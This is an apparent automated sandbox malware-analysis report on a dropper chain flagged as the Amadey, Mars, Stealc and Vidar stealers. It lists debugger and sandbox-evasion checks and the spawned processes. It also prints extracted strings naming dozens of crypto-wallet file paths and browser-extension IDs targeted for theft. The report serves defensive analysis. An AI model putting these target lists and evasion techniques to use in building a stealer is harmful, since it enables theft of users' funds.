Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_04CF05E2 Start: 04CF065A End: 04CF05F6 12_2_04CF05E2
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Code function: 7_2_05170DC5 rdtsc 7_2_05170DC5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C5A5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5AC410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0032643B mov eax, dword ptr fs:[00000030h] 12_2_0032643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0032A1A2 mov eax, dword ptr fs:[00000030h] 12_2_0032A1A2
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C57B66C
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C57B1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe" Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B341 cpuid 0_2_6C57B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5435A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5435A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002F6590 LookupAccountNameA, 12_2_002F6590
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 7.2.IDGHDGIDAK.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.explorti.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2243049461.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2646045722.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2198644151.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3235698523.00000000002F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2234772240.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2275486715.00000000002F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2239583360.0000000000AA1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2283301869.00000000002F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2198516833.0000000001655000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 528307a0ac.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
